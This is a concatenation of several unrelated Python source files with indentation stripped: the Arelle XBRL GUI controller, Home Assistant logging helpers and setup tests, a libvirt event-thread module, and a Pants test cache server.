def backgroundCompareDTSes(self, versReportFile):
startedAt = time.time()
modelVersReport = self.modelManager.compareDTSes(versReportFile)
if modelVersReport and modelVersReport.modelDocument:
self.addToLog(format_string(self.modelManager.locale,
_("compared in %.2f secs"),
time.time() - startedAt))
self.uiThreadQueue.put((self.showComparedDTSes, [modelVersReport]))
def showComparedDTSes(self, modelVersReport):
# close prior DTS displays
modelVersReport.modelDocument.fromDTS.closeViews()
modelVersReport.modelDocument.toDTS.closeViews()
self.showLoadedXbrl(modelVersReport, True)
def loadFile(self, filename):
self.filename = filename
self.listBox.delete(0, END)
self.dirty = False
try:
with open(self.filename, "rb") as fh:
self.data = pickle.load(fh)
for name in sorted(self.data, key=str.lower):
self.listBox.insert(END, name)
self.showStatus(_("Loaded {0} items from {1}").format(
self.listbox.size(),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to load {0}\n{1}").format(
self.filename,
err),
parent=self.parent)
def quit(self, event=None, restartAfterQuit=False):
if self.okayToContinue():
self.modelManager.close()
logging.shutdown()
global restartMain
restartMain = restartAfterQuit
state = self.parent.state()
if state == "normal":
self.config["windowGeometry"] = self.parent.geometry()
if state in ("normal", "zoomed"):
self.config["windowState"] = state
if self.isMSW: adjustW = 4; adjustH = 6 # tweak to prevent splitter regions from growing on reloading
elif self.isMac: adjustW = 54; adjustH = 39
else: adjustW = 2; adjustH = 2 # linux (tested on ubuntu)
self.config["tabWinTopLeftSize"] = (self.tabWinTopLeft.winfo_width() - adjustW,
self.tabWinTopLeft.winfo_height() - adjustH)
super(CntlrWinMain, self).close(saveConfig=True)
self.parent.unbind_all(())
self.parent.destroy()
if self.logFile:
self.logFile.close()
self.logFile = None
def restart(self, event=None):
self.quit(event, restartAfterQuit=True)
def setWorkOffline(self, *args):
self.webCache.workOffline = self.workOffline.get()
self.config["workOffline"] = self.webCache.workOffline
self.saveConfig()
def confirmClearWebCache(self):
if tkinter.messagebox.askyesno(
_("arelle - Clear Internet Cache"),
_("Are you sure you want to clear the internet cache?"),
parent=self.parent):
def backgroundClearCache():
self.showStatus(_("Clearing internet cache"))
self.webCache.clear()
self.showStatus(_("Internet cache cleared"), 5000)
thread = threading.Thread(target=lambda: backgroundClearCache())
thread.daemon = True
thread.start()
def manageWebCache(self):
if sys.platform.startswith("win"):
command = 'explorer'
elif sys.platform in ("darwin", "macos"):
command = 'open'
else: # linux/unix
command = 'xdg-open'
try:
subprocess.Popen([command,self.webCache.cacheDir])
except:
pass
def setupProxy(self):
from arelle.DialogUserPassword import askProxy
proxySettings = askProxy(self.parent, self.config.get("proxySettings"))
if proxySettings:
self.webCache.resetProxies(proxySettings)
self.config["proxySettings"] = proxySettings
self.saveConfig()
def setValidateDisclosureSystem(self, *args):
self.modelManager.validateDisclosureSystem = self.validateDisclosureSystem.get()
self.config["validateDisclosureSystem"] = self.modelManager.validateDisclosureSystem
self.saveConfig()
if self.modelManager.validateDisclosureSystem:
if not self.modelManager.disclosureSystem or not self.modelManager.disclosureSystem.selection:
self.selectDisclosureSystem()
self.setValidateTooltipText()
def selectDisclosureSystem(self, *args):
from arelle import DialogOpenArchive
self.config["disclosureSystem"] = DialogOpenArchive.selectDisclosureSystem(self, self.modelManager.disclosureSystem)
self.saveConfig()
self.setValidateTooltipText()
def formulaParametersDialog(self, *args):
DialogFormulaParameters.getParameters(self)
self.setValidateTooltipText()
def rssWatchOptionsDialog(self, *args):
from arelle import DialogRssWatch
DialogRssWatch.getOptions(self)
# find or open rssWatch view
def rssWatchControl(self, start=False, stop=False, close=False):
from arelle.ModelDocument import Type
from arelle import WatchRss
if not self.modelManager.rssWatchOptions.get("feedSourceUri"):
tkinter.messagebox.showwarning(_("RSS Watch Control Error"),
_("RSS Feed is not set up, please select options and select feed"),
parent=self.parent)
return False
rssModelXbrl = None
for loadedModelXbrl in self.modelManager.loadedModelXbrls:
if (loadedModelXbrl.modelDocument.type == Type.RSSFEED and
loadedModelXbrl.modelDocument.uri == self.modelManager.rssWatchOptions.get("feedSourceUri")):
rssModelXbrl = loadedModelXbrl
break
#not loaded
if start:
if not rssModelXbrl:
rssModelXbrl = self.modelManager.create(Type.RSSFEED, self.modelManager.rssWatchOptions.get("feedSourceUri"))
self.showLoadedXbrl(rssModelXbrl, False)
if not hasattr(rssModelXbrl,"watchRss"):
WatchRss.initializeWatcher(rssModelXbrl)
rssModelXbrl.watchRss.start()
elif stop:
if rssModelXbrl and rssModelXbrl.watchRss:
rssModelXbrl.watchRss.stop()
# for ui thread option updating
def rssWatchUpdateOption(self, latestPubDate=None):
self.uiThreadQueue.put((self.uiRssWatchUpdateOption, [latestPubDate]))
# ui thread addToLog
def uiRssWatchUpdateOption(self, latestPubDate):
if latestPubDate:
self.modelManager.rssWatchOptions["latestPubDate"] = latestPubDate
self.config["rssWatchOptions"] = self.modelManager.rssWatchOptions
self.saveConfig()
def languagesDialog(self, *args):
override = self.lang if self.lang != self.modelManager.defaultLang else ""
import tkinter.simpledialog
newValue = tkinter.simpledialog.askstring(_("arelle - Labels language code setting"),
_("The system default language is: {0} \n\n"
"You may override with a different language for labels display. \n\n"
"Current language override code: {1} \n"
"(Leave empty to use the system default language.)").format(
self.modelManager.defaultLang, override),
parent=self.parent)
if newValue is not None:
self.config["labelLangOverride"] = newValue
if newValue:
self.lang = newValue
else:
self.lang = self.modelManager.defaultLang
if self.modelManager.modelXbrl and self.modelManager.modelXbrl.modelDocument:
self.showLoadedXbrl(self.modelManager.modelXbrl, True) # reload views
self.saveConfig()
def setValidateTooltipText(self):
if self.modelManager.modelXbrl and not self.modelManager.modelXbrl.isClosed and self.modelManager.modelXbrl.modelDocument is not None:
valType = self.modelManager.modelXbrl.modelDocument.type
if valType in (ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE):
valName = "DTS"
else:
valName = ModelDocument.Type.typeName[valType]
if valType == ModelDocument.Type.VERSIONINGREPORT:
v = _("Validate versioning report")
else:
if self.modelManager.validateCalcLB:
if self.modelManager.validateInferDecimals:
c = _("\nCheck calculations (infer decimals)")
else:
c = _("\nCheck calculations (infer precision)")
else:
c = ""
if self.modelManager.validateUtr:
u = _("\nCheck unit type registry")
else:
u = ""
if self.modelManager.validateDisclosureSystem:
v = _("Validate {0}\nCheck disclosure system rules\n{1}{2}{3}").format(
valName, self.modelManager.disclosureSystem.selection,c,u)
else:
v = _("Validate {0}{1}{2}").format(valName, c, u)
else:
v = _("Validate")
self.validateTooltipText.set(v)
def setValidateCalcLB(self, *args):
self.modelManager.validateCalcLB = self.validateCalcLB.get()
self.config["validateCalcLB"] = self.modelManager.validateCalcLB
self.saveConfig()
self.setValidateTooltipText()
def setValidateInferDecimals(self, *args):
self.modelManager.validateInferDecimals = self.validateInferDecimals.get()
self.config["validateInferDecimals"] = self.modelManager.validateInferDecimals
self.saveConfig()
self.setValidateTooltipText()
def setValidateUtr(self, *args):
self.modelManager.validateUtr = self.validateUtr.get()
self.config["validateUtr"] = self.modelManager.validateUtr
self.saveConfig()
self.setValidateTooltipText()
def setCollectProfileStats(self, *args):
self.modelManager.collectProfileStats = self.collectProfileStats.get()
self.config["collectProfileStats"] = self.modelManager.collectProfileStats
self.saveConfig()
def find(self, *args):
from arelle.DialogFind import find
find(self)
def helpAbout(self, event=None):
from arelle import DialogAbout, Version
DialogAbout.about(self.parent,
_("About arelle"),
os.path.join(self.imagesDir, "arelle32.gif"),
_("arelle\u00ae {0} {1}bit {2}\n"
"An open source XBRL platform\n"
"\u00a9 2010-2013 Mark V Systems Limited\n"
"All rights reserved\nhttp://www.arelle.org\nsupport@arelle.org\n\n"
"Licensed under the Apache License, Version 2.0 (the \"License\"); "
"you may not use this file except in compliance with the License. "
"You may obtain a copy of the License at\n\n"
"http://www.apache.org/licenses/LICENSE-2.0\n\n"
"Unless required by applicable law or agreed to in writing, software "
"distributed under the License is distributed on an \"AS IS\" BASIS, "
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. "
"See the License for the specific language governing permissions and "
"limitations under the License."
"\n\nIncludes:"
"\n Python\u00ae \u00a9 2001-2013 Python Software Foundation"
"\n PyParsing \u00a9 2003-2013 Paul T. McGuire"
"\n lxml \u00a9 2004 Infrae, ElementTree \u00a9 1999-2004 by Fredrik Lundh"
"\n xlrd \u00a9 2005-2013 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2001 D. Giffin, \u00a9 2000 A. Khan"
"\n xlwt \u00a9 2007 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2005 R. V. Kiseliov"
"{3}"
)
.format(self.__version__, self.systemWordSize, Version.version,
_("\n Bottle \u00a9 2011-2013 Marcel Hellkamp") if self.hasWebServer else ""))
# worker threads addToLog
def addToLog(self, message, messageCode="", file="", level=logging.INFO):
self.uiThreadQueue.put((self.uiAddToLog, [message]))
# ui thread addToLog
def uiAddToLog(self, message):
try:
self.logView.append(message)
except:
pass
def logClear(self, *ignore):
self.logView.clear()
def logSelect(self, *ignore):
self.logView.select()
def logSaveToFile(self, *ignore):
filename = self.uiFileDialog("save",
title=_("arelle - Save Messages Log"),
initialdir=".",
filetypes=[(_("Txt file"), "*.txt")],
defaultextension=".txt")
if not filename:
return False
try:
self.logView.saveToFile(filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True;
# worker threads viewModelObject
def viewModelObject(self, modelXbrl, objectId):
self.waitForUiThreadQueue() # force prior ui view updates if any
self.uiThreadQueue.put((self.uiViewModelObject, [modelXbrl, objectId]))
# ui thread viewModelObject
def uiViewModelObject(self, modelXbrl, objectId):
modelXbrl.viewModelObject(objectId)
# worker threads viewModelObject
def reloadViews(self, modelXbrl):
self.uiThreadQueue.put((self.uiReloadViews, [modelXbrl]))
# ui thread viewModelObject
def uiReloadViews(self, modelXbrl):
for view in modelXbrl.views:
view.view()
# worker threads showStatus
def showStatus(self, message, clearAfter=None):
self.uiThreadQueue.put((self.uiShowStatus, [message, clearAfter]))
# ui thread showStatus
def uiClearStatusTimerEvent(self):
if self.statusbarTimerId: # if timer still wanted, clear status
self.statusbar["text"] = ""
self.statusbarTimerId = None
def uiShowStatus(self, message, clearAfter=None):
if self.statusbarTimerId: # ignore timer
self.statusbarTimerId = None
self.statusbar["text"] = message
if clearAfter is not None and clearAfter > 0:
self.statusbarTimerId = self.statusbar.after(clearAfter, self.uiClearStatusTimerEvent)
# web authentication password request
def internet_user_password(self, host, realm):
from arelle.DialogUserPassword import askUserPassword
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askUserPassword, [self.parent, host, realm, untilDone, result]))
untilDone.wait()
return result[0]
# web file login requested
def internet_logon(self, url, quotedUrl, dialogCaption, dialogText):
from arelle.DialogUserPassword import askInternetLogon
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askInternetLogon, [self.parent, url, quotedUrl, dialogCaption, dialogText, untilDone, result]))
untilDone.wait()
return result[0]
def waitForUiThreadQueue(self):
for i in range(40): # max 2 secs
if self.uiThreadQueue.empty():
break
time.sleep(0.05)
def uiThreadChecker(self, widget, delayMsecs=100): # 10x per second
# process callback on main (UI) thread
while not self.uiThreadQueue.empty():
try:
(callback, args) = self.uiThreadQueue.get(block=False)
except queue.Empty:
pass
else:
callback(*args)
widget.after(delayMsecs, lambda: self.uiThreadChecker(widget))
def uiFileDialog(self, action, title=None, initialdir=None, filetypes=[], defaultextension=None, owner=None, multiple=False, parent=None):
if parent is None: parent = self.parent
if multiple and action == "open": # return as simple list of file names
multFileNames = tkinter.filedialog.askopenfilename(
multiple=True,
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
if self.isMac:
return multFileNames
return re.findall("[{]([^}]+)[}]", # multiple returns "{file1} {file2}..."
multFileNames)
elif self.hasWin32gui:
import win32gui
try:
filename, filter, flags = {"open":win32gui.GetOpenFileNameW,
"save":win32gui.GetSaveFileNameW}[action](
hwndOwner=(owner if owner else parent).winfo_id(),
hInstance=win32gui.GetModuleHandle(None),
Filter='\0'.join(e for t in filetypes+['\0'] for e in t),
MaxFile=4096,
InitialDir=initialdir,
Title=title,
DefExt=defaultextension)
return filename
except win32gui.error:
return ''
else:
return {"open":tkinter.filedialog.askopenfilename,
"save":tkinter.filedialog.asksaveasfilename}[action](
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
from arelle import DialogFormulaParameters
class WinMainLogHandler(logging.Handler):
def __init__(self, cntlr):
super(WinMainLogHandler, self).__init__()
self.cntlr = cntlr
#formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s - %(file)s %(sourceLine)s")
formatter = Cntlr.LogFormatter("[%(messageCode)s] %(message)s - %(file)s")
self.setFormatter(formatter)
def flush(self):
''' Nothing to flush '''
def emit(self, logRecord):
# add to logView
msg = self.format(logRecord)
try:
self.cntlr.addToLog(msg)
except:
pass
class TkinterCallWrapper:
"""Replacement for internal tkinter class. Stores function to call when some user
defined Tcl function is called e.g. after an event occurred."""
def __init__(self, func, subst, widget):
"""Store FUNC, SUBST and WIDGET as members."""
self.func = func
self.subst = subst
self.widget = widget
def __call__(self, *args):
"""Apply first function SUBST to arguments, than FUNC."""
try:
if self.subst:
args = self.subst(*args)
return self.func(*args)
except SystemExit as msg:
raise SystemExit(msg)
except Exception:
# this was tkinter's standard coding: self.widget._report_exception()
exc_type, exc_value, exc_traceback = sys.exc_info()
msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
tracebk = ''.join(traceback.format_tb(exc_traceback, limit=7))
tkinter.messagebox.showerror(_("Exception"),
_("{0}\nCall trace\n{1}").format(msg, tracebk))
def main():
# this is the entry called by arelleGUI.pyw for windows
global restartMain
while restartMain:
restartMain = False
application = Tk()
cntlrWinMain = CntlrWinMain(application)
application.protocol("WM_DELETE_WINDOW", cntlrWinMain.quit)
application.mainloop()
if __name__ == "__main__":
# this is the entry called by MacOS open and MacOS shell scripts
# check if ARELLE_ARGS are used to emulate command line operation
if os.getenv("ARELLE_ARGS"):
# command line mode
from arelle import CntlrCmdLine
CntlrCmdLine.main()
else:
# GUI mode
main() |
logging.py | """Logging utilities."""
import asyncio
from asyncio.events import AbstractEventLoop
from functools import partial, wraps
import inspect
import logging
import threading
import traceback
from typing import Any, Callable, Coroutine, Optional
class HideSensitiveDataFilter(logging.Filter):
"""Filter API password calls."""
def __init__(self, text: str) -> None:
"""Initialize sensitive data filter."""
super().__init__()
self.text = text
def filter(self, record: logging.LogRecord) -> bool:
"""Hide sensitive data in messages."""
record.msg = record.msg.replace(self.text, "*******")
return True
# pylint: disable=invalid-name
class AsyncHandler:
"""Logging handler wrapper to add an async layer."""
def __init__(self, loop: AbstractEventLoop, handler: logging.Handler) -> None:
"""Initialize async logging handler wrapper."""
self.handler = handler
self.loop = loop
self._queue: asyncio.Queue = asyncio.Queue(loop=loop)
self._thread = threading.Thread(target=self._process)
# Delegate from handler
self.setLevel = handler.setLevel
self.setFormatter = handler.setFormatter
self.addFilter = handler.addFilter
self.removeFilter = handler.removeFilter
self.filter = handler.filter
self.flush = handler.flush
self.handle = handler.handle
self.handleError = handler.handleError
self.format = handler.format
self._thread.start()
def close(self) -> None:
"""Wrap close to handler."""
self.emit(None)
async def async_close(self, blocking: bool = False) -> None:
"""Close the handler.
When blocking=True, will wait till closed.
"""
await self._queue.put(None)
if blocking:
while self._thread.is_alive():
await asyncio.sleep(0)
def emit(self, record: Optional[logging.LogRecord]) -> None:
"""Process a record."""
ident = self.loop.__dict__.get("_thread_ident")
# inside eventloop
if ident is not None and ident == threading.get_ident():
self._queue.put_nowait(record)
# from a thread/executor
else:
self.loop.call_soon_threadsafe(self._queue.put_nowait, record)
def __repr__(self) -> str:
"""Return the string names."""
return str(self.handler)
def _process(self) -> None:
"""Process log in a thread."""
try:
while True:
record = asyncio.run_coroutine_threadsafe(
self._queue.get(), self.loop
).result()
if record is None:
self.handler.close()
return
self.handler.emit(record)
except asyncio.CancelledError:
self.handler.close()
def createLock(self) -> None:
"""Ignore lock stuff."""
pass
def acquire(self) -> None:
"""Ignore lock stuff."""
pass
def release(self) -> None:
"""Ignore lock stuff."""
pass
@property
def level(self) -> int:
"""Wrap property level to handler."""
return self.handler.level
@property
def formatter(self) -> Optional[logging.Formatter]:
"""Wrap property formatter to handler."""
return self.handler.formatter
@property
def name(self) -> str:
"""Wrap property set_name to handler."""
return self.handler.get_name() # type: ignore
@name.setter
def name(self, name: str) -> None:
"""Wrap property get_name to handler."""
self.handler.set_name(name) # type: ignore
def catch_log_exception(
func: Callable[..., Any], format_err: Callable[..., Any], *args: Any
) -> Callable[[], None]:
"""Decorate a callback to catch and log exceptions."""
def log_exception(*args: Any) -> None:
module = inspect.getmodule(inspect.stack()[1][0])
if module is not None:
module_name = module.__name__
else:
# If Python is unable to access the sources files, the call stack frame
# will be missing information, so let's guard.
# https://github.com/home-assistant/home-assistant/issues/24982
module_name = __name__
# Do not print the wrapper in the traceback
frames = len(inspect.trace()) - 1
exc_msg = traceback.format_exc(-frames)
friendly_msg = format_err(*args)
logging.getLogger(module_name).error("%s\n%s", friendly_msg, exc_msg)
# Check for partials to properly determine if coroutine function
check_func = func
while isinstance(check_func, partial):
check_func = check_func.func
wrapper_func = None
if asyncio.iscoroutinefunction(check_func):
@wraps(func)
async def async_wrapper(*args: Any) -> None:
"""Catch and log exception."""
try:
await func(*args)
except Exception: # pylint: disable=broad-except
log_exception(*args)
wrapper_func = async_wrapper
else:
@wraps(func)
def wrapper(*args: Any) -> None:
"""Catch and log exception."""
try:
func(*args)
except Exception: # pylint: disable=broad-except
log_exception(*args)
wrapper_func = wrapper
return wrapper_func
def catch_log_coro_exception(
target: Coroutine[Any, Any, Any], format_err: Callable[..., Any], *args: Any
) -> Coroutine[Any, Any, Any]:
"""Decorate a coroutine to catch and log exceptions."""
async def coro_wrapper(*args: Any) -> Any:
"""Catch and log exception."""
try:
return await target
except Exception: # pylint: disable=broad-except
module = inspect.getmodule(inspect.stack()[1][0])
if module is not None:
module_name = module.__name__
else:
# If Python is unable to access the sources files, the frame
# will be missing information, so let's guard.
# https://github.com/home-assistant/home-assistant/issues/24982
module_name = __name__
# Do not print the wrapper in the traceback
frames = len(inspect.trace()) - 1
exc_msg = traceback.format_exc(-frames)
friendly_msg = format_err(*args)
logging.getLogger(module_name).error("%s\n%s", friendly_msg, exc_msg)
return None
return coro_wrapper()
def async_create_catching_coro(target: Coroutine) -> Coroutine:
"""Wrap a coroutine to catch and log exceptions.
The exception will be logged together with a stacktrace of where the
coroutine was wrapped.
target: target coroutine.
"""
trace = traceback.extract_stack()
wrapped_target = catch_log_coro_exception(
target,
lambda *args: "Exception in {} called from\n {}".format(
target.__name__, # type: ignore
"".join(traceback.format_list(trace[:-1])),
),
)
return wrapped_target
|
libvirt_events_thread.py | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
# To use libvirt callbacks, one has to setup a single process-wide event loop for
# libvirt. This module provisions the event loop in a python thread dedicated to
# handling libvirt events.
import asyncio
from threading import Event, Lock, Thread
from typing import Any, Callable, Optional
import libvirtaio # type: ignore
_callbacks_thread_lock = Lock()
_callbacks_thread: Optional[Thread] = None
_callbacks_thread_running = Event()
_callbacks_loop: Optional[asyncio.AbstractEventLoop] = None
# Entry-point for the libvirt events thread.
def _libvirt_events_thread() -> None:
global _callbacks_loop
# Provision this thread as an asyncio thread.
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
_callbacks_loop = loop
# Initialize this thread as the libvirt events thread.
libvirtaio.virEventRegisterAsyncIOImpl()
# Signal that thread is initialized.
_callbacks_thread_running.set()
# Run the asyncio loop.
loop.run_forever()
def init() -> None:
global _callbacks_thread
# Check if the events thread is already running.
if _callbacks_thread_running.is_set():
return
_callbacks_thread_lock.acquire()
try:
# Check if the events thread already exists.
if not _callbacks_thread:
# Start the thread.
thread = Thread(target=_libvirt_events_thread)
thread.daemon = True
thread.start()
_callbacks_thread = thread
finally:
_callbacks_thread_lock.release()
# Wait for the events thread to initialize.
_callbacks_thread_running.wait()
# Run a callback on the libvirt events thread.
def run_callback(callback: Callable[..., Any], *args: Any) -> asyncio.Handle:
assert _callbacks_thread_running.is_set()
assert _callbacks_loop
return _callbacks_loop.call_soon_threadsafe(callback, *args)
|
cache_server.py | # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import http.server
import os
import re
import socketserver
from contextlib import contextmanager
from multiprocessing import Process, Queue
from pants.testutil.file_test_util import exact_files
from pants.util.contextutil import pushd, temporary_dir
from pants.util.dirutil import safe_mkdir
# NB: All API methods should follow redirects, so we always inject one redirect for all handler
# methods before serving.
def redirect_once(func):
def wrapper(self):
if self.path.endswith("/__redir__"):
self.path = os.path.dirname(self.path)
return func(self)
else:
self.send_response(307, "Found")
self.send_header("Location", os.path.join(self.path, "__redir__"))
self.end_headers()
return wrapper
# A very trivial server that serves files under the cwd.
class SimpleRESTHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, request, client_address, server):
# The base class implements GET and HEAD.
# Old-style class, so we must invoke __init__ this way.
http.server.SimpleHTTPRequestHandler.__init__(self, request, client_address, server)
@redirect_once
def do_HEAD(self):
return http.server.SimpleHTTPRequestHandler.do_HEAD(self)
@redirect_once
def do_GET(self):
return http.server.SimpleHTTPRequestHandler.do_GET(self)
@redirect_once
def do_PUT(self):
path = self.translate_path(self.path)
content_length = int(self.headers.get("content-length"))
content = self.rfile.read(content_length)
safe_mkdir(os.path.dirname(path))
with open(path, "wb") as outfile:
outfile.write(content)
self.send_response(200)
self.end_headers()
@redirect_once
def do_DELETE(self):
path = self.translate_path(self.path)
if os.path.exists(path):
os.unlink(path)
self.send_response(200)
else:
self.send_error(404, "File not found")
self.end_headers()
class FailRESTHandler(http.server.SimpleHTTPRequestHandler):
"""Reject all requests."""
def __init__(self, request, client_address, server):
# Old-style class, so we must invoke __init__ this way.
http.server.SimpleHTTPRequestHandler.__init__(self, request, client_address, server)
def _return_failed(self):
self.send_response(401, "Forced test failure")
self.end_headers()
@redirect_once
def do_HEAD(self):
return self._return_failed()
@redirect_once
def do_GET(self):
return self._return_failed()
@redirect_once
def do_PUT(self):
return self._return_failed()
@redirect_once
def do_DELETE(self):
return self._return_failed()
class ConnectionErrorRESTHandler(FailRESTHandler):
"""Fail to connect to all requests."""
def _return_failed(self):
raise Exception("Intentional connection failure!")
class TestCacheServer:
"""A wrapper class that represents the underlying REST server.
To create a TestCacheServer, use the `cache_server` factory function.
"""
def __init__(self, url, cache_root):
self.url = url
self._cache_root = cache_root
def corrupt_artifacts(self, pattern):
"""Corrupts any artifacts matching the given pattern.
Returns the number of files affected.
"""
regex = re.compile(pattern)
count = 0
for f in exact_files(self._cache_root, ignore_links=True):
if not regex.match(f):
continue
# Truncate the file.
abspath = os.path.join(self._cache_root, f)
artifact_size = os.path.getsize(abspath)
with open(abspath, "r+") as outfile:
outfile.truncate(artifact_size // 2)
count += 1
return count
def _cache_server_process(queue, return_failed, cache_root):
"""A pickleable top-level function to wrap a SimpleRESTHandler.
We fork a separate process to avoid affecting the `cwd` of the requesting process.
"""
httpd = None
try:
with temporary_dir() as tmpdir:
cache_root = cache_root if cache_root else tmpdir
with pushd(cache_root): # SimpleRESTHandler serves from the cwd.
if return_failed is True:
handler = FailRESTHandler
elif return_failed is False:
handler = SimpleRESTHandler
elif return_failed == "connection-error":
handler = ConnectionErrorRESTHandler
httpd = socketserver.TCPServer(("localhost", 0), handler)
port = httpd.server_address[1]
queue.put(port)
httpd.serve_forever()
finally:
if httpd:
httpd.shutdown()
@contextmanager
def cache_server(return_failed=False, cache_root=None):
"""A context manager which launches a temporary cache server on a random port.
Yields a TestCacheServer to represent the running server.
"""
queue = Queue()
process = Process(target=_cache_server_process, args=(queue, return_failed, cache_root))
process.start()
try:
port = queue.get()
yield TestCacheServer(f"http://localhost:{port}", cache_root)
finally:
process.terminate()
|
test_setup.py | """Test component/platform setup."""
# pylint: disable=protected-access
import asyncio
import os
import threading
from unittest.mock import Mock, patch
import pytest
import voluptuous as vol
from homeassistant import config_entries, setup
import homeassistant.config as config_util
from homeassistant.const import EVENT_COMPONENT_LOADED, EVENT_HOMEASSISTANT_START
from homeassistant.core import callback
from homeassistant.helpers import discovery
from homeassistant.helpers.config_validation import (
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
)
import homeassistant.util.dt as dt_util
from tests.common import (
MockConfigEntry,
MockModule,
MockPlatform,
assert_setup_component,
get_test_config_dir,
get_test_home_assistant,
mock_entity_platform,
mock_integration,
)
ORIG_TIMEZONE = dt_util.DEFAULT_TIME_ZONE
VERSION_PATH = os.path.join(get_test_config_dir(), config_util.VERSION_FILE)
@pytest.fixture(autouse=True)
def mock_handlers():
"""Mock config flows."""
class MockFlowHandler(config_entries.ConfigFlow):
"""Define a mock flow handler."""
VERSION = 1
with patch.dict(config_entries.HANDLERS, {"comp": MockFlowHandler}):
yield
class TestSetup:
"""Test the bootstrap utils."""
hass = None
backup_cache = None
# pylint: disable=invalid-name, no-self-use
def setup_method(self, method):
"""Set up the test."""
self.hass = get_test_home_assistant()
def teardown_method(self, method):
"""Clean up."""
self.hass.stop()
def test_validate_component_config(self):
"""Test validating component configuration."""
config_schema = vol.Schema({"comp_conf": {"hello": str}}, required=True)
mock_integration(
self.hass, MockModule("comp_conf", config_schema=config_schema)
)
with assert_setup_component(0):
assert not setup.setup_component(self.hass, "comp_conf", {})
self.hass.data.pop(setup.DATA_SETUP)
with assert_setup_component(0):
assert not setup.setup_component(
self.hass, "comp_conf", {"comp_conf": None}
)
self.hass.data.pop(setup.DATA_SETUP)
with assert_setup_component(0):
assert not setup.setup_component(self.hass, "comp_conf", {"comp_conf": {}})
self.hass.data.pop(setup.DATA_SETUP)
with assert_setup_component(0):
assert not setup.setup_component(
self.hass,
"comp_conf",
{"comp_conf": {"hello": "world", "invalid": "extra"}},
)
self.hass.data.pop(setup.DATA_SETUP)
with assert_setup_component(1):
assert setup.setup_component(
self.hass, "comp_conf", {"comp_conf": {"hello": "world"}}
)
def test_validate_platform_config(self, caplog):
"""Test validating platform configuration."""
platform_schema = PLATFORM_SCHEMA.extend({"hello": str})
platform_schema_base = PLATFORM_SCHEMA_BASE.extend({})
mock_integration(
self.hass,
MockModule("platform_conf", platform_schema_base=platform_schema_base),
)
mock_entity_platform(
self.hass,
"platform_conf.whatever",
MockPlatform(platform_schema=platform_schema),
)
with assert_setup_component(0):
assert setup.setup_component(
self.hass,
"platform_conf",
{"platform_conf": {"platform": "not_existing", "hello": "world"}},
)
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove("platform_conf")
with assert_setup_component(1):
assert setup.setup_component(
self.hass,
"platform_conf",
{"platform_conf": {"platform": "whatever", "hello": "world"}},
)
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove("platform_conf")
with assert_setup_component(1):
assert setup.setup_component(
self.hass,
"platform_conf",
{"platform_conf": [{"platform": "whatever", "hello": "world"}]},
)
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove("platform_conf")
# Any falsey platform config will be ignored (None, {}, etc)
with assert_setup_component(0) as config:
assert setup.setup_component(
self.hass, "platform_conf", {"platform_conf": None}
)
assert "platform_conf" in self.hass.config.components
assert not config["platform_conf"] # empty
assert setup.setup_component(
self.hass, "platform_conf", {"platform_conf": {}}
)
assert "platform_conf" in self.hass.config.components
assert not config["platform_conf"] # empty
def test_validate_platform_config_2(self, caplog):
"""Test component PLATFORM_SCHEMA_BASE prio over PLATFORM_SCHEMA."""
platform_schema = PLATFORM_SCHEMA.extend({"hello": str})
platform_schema_base = PLATFORM_SCHEMA_BASE.extend({"hello": "world"})
mock_integration(
self.hass,
MockModule(
"platform_conf",
platform_schema=platform_schema,
platform_schema_base=platform_schema_base,
),
)
mock_entity_platform(
self.hass,
"platform_conf.whatever",
MockPlatform("whatever", platform_schema=platform_schema),
)
with assert_setup_component(1):
assert setup.setup_component(
self.hass,
"platform_conf",
{
# pass
"platform_conf": {"platform": "whatever", "hello": "world"},
# fail: key hello violates component platform_schema_base
"platform_conf 2": {"platform": "whatever", "hello": "there"},
},
)
def test_validate_platform_config_3(self, caplog):
"""Test fallback to component PLATFORM_SCHEMA."""
component_schema = PLATFORM_SCHEMA_BASE.extend({"hello": str})
platform_schema = PLATFORM_SCHEMA.extend({"cheers": str, "hello": "world"})
mock_integration(
self.hass, MockModule("platform_conf", platform_schema=component_schema)
)
mock_entity_platform(
self.hass,
"platform_conf.whatever",
MockPlatform("whatever", platform_schema=platform_schema),
)
with assert_setup_component(1):
assert setup.setup_component(
self.hass,
"platform_conf",
{
# pass
"platform_conf": {"platform": "whatever", "hello": "world"},
# fail: key hello violates component platform_schema
"platform_conf 2": {"platform": "whatever", "hello": "there"},
},
)
def test_validate_platform_config_4(self):
"""Test entity_namespace in PLATFORM_SCHEMA."""
component_schema = PLATFORM_SCHEMA_BASE
platform_schema = PLATFORM_SCHEMA
mock_integration(
self.hass,
MockModule("platform_conf", platform_schema_base=component_schema),
)
mock_entity_platform(
self.hass,
"platform_conf.whatever",
MockPlatform(platform_schema=platform_schema),
)
with assert_setup_component(1):
assert setup.setup_component(
self.hass,
"platform_conf",
{
"platform_conf": {
# pass: entity_namespace accepted by PLATFORM_SCHEMA
"platform": "whatever",
"entity_namespace": "yummy",
}
},
)
self.hass.data.pop(setup.DATA_SETUP)
